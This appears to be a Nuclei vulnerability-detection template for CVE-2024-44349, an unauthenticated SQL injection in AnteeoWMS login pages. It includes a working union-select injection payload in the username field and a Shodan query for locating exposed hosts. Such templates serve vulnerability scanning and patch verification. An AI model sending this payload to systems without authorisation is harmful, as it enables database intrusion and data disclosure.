70 lines
2.7 KiB
YAML
70 lines
2.7 KiB
YAML
id: CVE-2024-44349
|
|
|
|
info:
|
|
name: AnteeoWMS < v4.7.34 - SQL Injection
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
|
|
reference:
|
|
- https://blog.cybergon.com/posts/cve-2024-44349/
|
|
- http://nvd.nist.gov/vuln/detail/CVE-2024-44349
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-44349
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: html:"ANTEEO"
|
|
tags: cve,cve2024,sqli,anteeowms
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /default.aspx HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
name: viewstate
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'
|
|
|
|
- type: regex
|
|
part: body
|
|
name: viewstategen
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'
|
|
|
|
- type: regex
|
|
part: body
|
|
name: eventval
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'
|
|
|
|
- raw:
|
|
- |
|
|
POST /default.aspx HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Conversion failed when converting the nvarchar value 'Microsoft SQL Server'
|
|
# digest: 4a0a0047304502205a5bc70a82453302b02d97fb6b99d6a726505ee73b0815574e381ac7224c09050221008795017bf36669ad6b978ae76fd3ff3868aea81a23c27898e0436cc657b7e0e7:922c64590222798bb761d5b6d8e72950 |